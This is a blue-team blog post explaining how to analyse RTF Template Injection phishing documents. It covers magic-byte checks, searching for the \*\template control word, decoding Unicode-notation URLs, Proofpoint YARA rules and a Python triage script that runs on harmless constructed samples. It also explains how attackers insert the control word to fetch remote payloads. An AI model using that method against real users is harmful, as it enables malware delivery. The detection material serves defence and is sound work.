URL: https://letsdefend.io/blog/how-to-analyze-rtf-template-injection-attacks/
LetsDefend Blue Team Blog
Categories: Detection, Malware


HOW TO ANALYZE RTF TEMPLATE INJECTION ATTACKS

By Admin, January 21, 2022



Proofpoint security researchers report that cyber attack groups have adopted a
new technique called “RTF Template Injection” and that this technique has a low
detection rate. The report also states that in 2021 phishing attacks were
carried out against many institutions using the RTF Template Injection
technique by cyber threat groups in India, China and Russia.



Let’s take a look at what this technique is, how it is exploited by attackers,
how to analyze a file with RTF format and how to detect RTF Template Injection
attacks.


WHAT IS RTF TEMPLATE INJECTION?

Rich Text Format (RTF) is a file format that determines how text is formatted.
It was developed by Microsoft between 1987 and 2008. You can find the Rich Text
Format (RTF) Version 1.5 specification here.



The RTF file format consists of unformatted text, control words, control symbols
and groups. RTF readers use them to display the text in the specified format.



The RTF template control word specifies the template used to format the
document. The specified template is usually located on the local device.
However, attackers abuse the RTF template feature to make the document download
a malicious payload from a remote server under their control.


HOW DO ATTACKERS LEVERAGE THE RTF TEMPLATE FEATURE?

In order to perform a successful analysis, we must first understand how the
attack takes place. Let’s take a look at how attackers exploit the RTF template
feature.

When we examine the Rich Text Format v1.5 specifications, we see that there are
many control words for formatting the document. When we look at the
“\*\template” control word, we see that this control word is used to specify the
target template file so that the document can be formatted.



By pointing the “\*\template” control word at a URL on a server under their
control instead of at a legitimate template file, attackers cause the malicious
payload to be downloaded as soon as the document is opened. All it takes to make
an RTF document malicious is to insert the “\*\template” control word with a hex
editor, either by adding it to the document or by replacing an existing document
property with it, so that the payload is fetched when the document is opened.

In the article published by Proofpoint, it is stated that the “DoNot” attacker
group added the “\*\template” control word to the List Overwrite Table, the
“TA423” attacker group added it by replacing the pre-existing font family
control word, and the “Gamaredon” attack group added it through the same method
as the “DoNot” attack group.

When the samples in which the “DoNot”, “TA423” and “Gamaredon” attack groups
used the RTF Template Injection technique were examined, “TA423” and “Gamaredon”
had written the URL of the malicious payload as plain text, while “DoNot” had
written it in Unicode signed character notation.

DoNot APT Group Sample – 03674b4f49ea0fef46fd83d5cdb27443


HOW TO ANALYZE RTF FILES?

Now that we understand how the attack happened, we can move on to how to analyze
a suspicious RTF document.

First, we need to confirm whether the sample we have really is a file in RTF
format.

You can confirm whether the document is indeed in RTF format by checking the
magic bytes of the sample: if the first bytes of the file match the magic bytes
of the RTF format ({\rtf ), it is an RTF file. Files in RTF format normally
carry the “.rtf” extension, but the extension alone is no guarantee that the
file is an RTF file. For this reason, it is more accurate to base your check on
the magic bytes.



As mentioned above, the attackers must add the “\*\template” control word to
the RTF document for the RTF Template Injection attack to take place. Since this
step is necessary for the attack to succeed, you can search for the
“\*\template” control word while tracking the traces of an RTF Template
Injection attack in your sample. This control word has no fixed offset, so we
cannot look at one specific part of the file; the search has to cover the entire
file.

Almost all Hex Editors allow searching within the file. You can make your
searches using this feature of Hex Editors.



If you cannot use a hex editor, you can find the “\*\template” control word by
searching the strings of the file with tools such as BinText or strings.



As mentioned above, attackers can write the URL either as plain text or in
Unicode signed character notation, so you may need to decode it to obtain the
URL. After obtaining the URL added by the attacker, continue the analysis by
analyzing the malicious payload.

Dynamic analysis of an RTF file lets you identify the malicious URL faster: a
network capture tool will show the HTTP request the document sends when it is
opened.



APT GROUPS

Some of the cyber threat groups using the RTF Template Injection technique are
as follows:

 * Gamaredon
 * DoNot
 * TA423

Although the number of attack groups using the RTF Template Injection technique
is limited at the moment, it will not take long for more groups to adopt it,
just like other groups such as “APT28” and “Inception”.

MITRE ATT&CK

https://attack.mitre.org/techniques/T1221/

Tactic: Defense Evasion (TA0005)
Technique: Template Injection (T1221)

YARA RULES

You can create YARA rules to detect RTF Template Injection attacks. Below are
the YARA rules prepared by Proofpoint:

rule RTF_Template_Injection_Plaintext_PLACEHOLDER // rule name is missing from the page; placeholder name
{
	meta:
		author = "Proofpoint Threat Research"
		description = "Detects malicious RTFs using RTF Template Injection to Retrieve Remote Content from a URL"
		disclaimer = "Yara signature created for hunting purposes - not quality controlled within enterprise environment"
		hash1 = "43538d9010462668721f178efaeca89f95f6f35a"
		hash2 = "b5ec74e127ce9dfcb1b3bd9072c1d554b59b4005"
	strings:
		$rtf = { 7b 5c 72 74 66 } // rtf_bytes: {\rtf
		$s1 = "{\\*\\template http" ascii nocase // https_intentionally_not_specified
	condition:
		$rtf at 0 and $s1
}

rule Proofpoint_RTFtemplateInjection_Technique_Generic_Unicode_16Bit
{
	meta:
		author = "Proofpoint Threat Research"
		description = "Detects malicious RTFs using RTF Template Injection to Retrieve Remote Content from Unicode 16 Bit Encoded URL"
		disclaimer = "Yara signature created for hunting purposes - not quality controlled within enterprise environment"
		hash1 = "fbc8064399008fe20f350f0de5e4bbf5833847c7"
		hash2 = "6c01fe16e8cffa3049e84707672b82dc32f1cf72"
	strings:
		$rtf = { 7b 5c 72 74 66 } // rtf_bytes: {\rtf
		$s1 = { 7B 5C 2A 5C 74 65 6D 70 6C 61 74 65 20 0D 0A 5C 75 2D } // {\*\template \u-
	condition:
		$rtf at 0 and $s1
}
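The static steps described in the analysis section (magic-byte check, locating the “\*\template” group, decoding the Unicode signed character notation) and the two YARA rules above can be tied together in a small triage script. The Python below is an added example for this article; it is not code from LetsDefend or from Proofpoint. It uses only the standard library, the RTF samples in it are constructed for the demo and point at the reserved .invalid domain, and it assumes the RTF default of one fallback character per \uN (\uc1), which is the form described for the reported samples.

```python
"""Static triage of an RTF sample for the \\*\\template injection marker.

Added example for this article; not code from LetsDefend or Proofpoint.
Standard library only. The RTF samples at the bottom are constructed (not real
malware) and point at the reserved .invalid TLD.
Assumption: Unicode-notation URLs use the RTF default of one fallback
character per \\uN (\\uc1).
"""
import re
from typing import Optional

RTF_MAGIC = b"{\\rtf"  # {\rtf magic bytes; same check as `$rtf at 0` in the YARA rules

# {\*\template <target>} group; the target runs up to the closing brace.
TEMPLATE_GROUP_RE = re.compile(rb"\{\\\*\\template\s*(.*?)\}", re.DOTALL)
# \uN control word: N is a signed 16-bit decimal, optionally followed by a space delimiter.
UNICODE_CW_RE = re.compile(rb"\\u(-?\d+) ?")
# \ucN sets the fallback length; we strip it and rely on the assumed default of 1.
UC_CW_RE = re.compile(rb"\\uc\d+ ?")


def decode_rtf_unicode(data: bytes, fallback_len: int = 1) -> str:
    """Turn \\uN runs into text. Negative N wraps to 0..65535 (RTF stores the
    code point as a signed 16-bit integer); each \\uN is followed by
    `fallback_len` bytes of fallback text that must be skipped."""
    out = []
    pos = 0
    while True:
        m = UNICODE_CW_RE.search(data, pos)
        if m is None:
            out.append(data[pos:].decode("latin-1"))
            return "".join(out)
        out.append(data[pos:m.start()].decode("latin-1"))
        out.append(chr(int(m.group(1)) % 65536))
        pos = m.end() + fallback_len


def extract_template_targets(data: bytes) -> dict:
    """Return the magic-byte verdict and every \\*\\template target, decoded."""
    report = {"is_rtf": data.startswith(RTF_MAGIC), "targets": []}
    if not report["is_rtf"]:
        return report
    for m in TEMPLATE_GROUP_RE.finditer(data):
        body = UC_CW_RE.sub(b"", m.group(1)).replace(b"\r", b"").replace(b"\n", b"")
        encoding = "unicode" if b"\\u" in body else "plaintext"
        target = decode_rtf_unicode(body) if encoding == "unicode" else body.decode("latin-1")
        report["targets"].append({"encoding": encoding, "target": target.strip()})
    return report


def remote_template_targets(data: bytes) -> list:
    """Targets that point at a URL rather than at a local template file."""
    return [t["target"] for t in extract_template_targets(data)["targets"]
            if t["target"].lower().startswith(("http://", "https://"))]


def matches_proofpoint_shape(data: bytes) -> Optional[str]:
    """Byte-level mirror of the two YARA rules: magic at offset 0 plus either the
    plaintext `{\\*\\template http` (case-insensitive) or the
    `{\\*\\template \\r\\n\\u-` prefix of the 16-bit Unicode variant."""
    if not data.startswith(RTF_MAGIC):
        return None
    if b"{\\*\\template http" in data.lower():
        return "plaintext"
    if b"{\\*\\template \r\n\\u-" in data:
        return "unicode_16bit"
    return None


# Constructed samples for the demo (not real malware).
SAMPLE_LOCAL = b"{\\rtf1\\ansi{\\*\\template C:\\\\Templates\\\\Normal.dotm}\\pard Hi\\par}"
SAMPLE_PLAINTEXT_URL = (
    b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Arial;}}"
    b"{\\*\\template http://x.invalid/t.dotm}"
    b"\\pard Hello\\par}"
)
# Same URL written as \u-N? pairs (N = code point - 65536, '?' fallback char).
SAMPLE_UNICODE_URL = (
    b"{\\rtf1\\ansi\\deff0{\\*\\template \r\n"
    b"\\u-65432?\\u-65420?\\u-65420?\\u-65424?\\u-65478?\\u-65489?\\u-65489?"  # http://
    b"\\u-65416?\\u-65490?\\u-65431?\\u-65426?\\u-65418?\\u-65439?\\u-65428?\\u-65431?\\u-65436?"  # x.invalid
    b"\\u-65489?\\u-65420?\\u-65490?\\u-65436?\\u-65425?\\u-65420?\\u-65427?}"  # /t.dotm
    b"\\pard Hello\\par}"
)
NOT_RTF = b"PK\x03\x04 not an rtf file {\\*\\template http://x.invalid/t.dotm}"

if __name__ == "__main__":
    for name, blob in [("local", SAMPLE_LOCAL), ("plaintext-url", SAMPLE_PLAINTEXT_URL),
                       ("unicode-url", SAMPLE_UNICODE_URL), ("not-rtf", NOT_RTF)]:
        print(name, extract_template_targets(blob), matches_proofpoint_shape(blob))
```

The group parser deliberately reports every template target, local or remote, so an analyst sees the legitimate case too; `remote_template_targets` applies the same "starts with http" judgement as the plaintext YARA rule, but after decoding, which is what catches the Unicode-notation variant that a plain string search misses.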

REFERENCE

https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread


Tags: analyze rtf file, rtf template injection
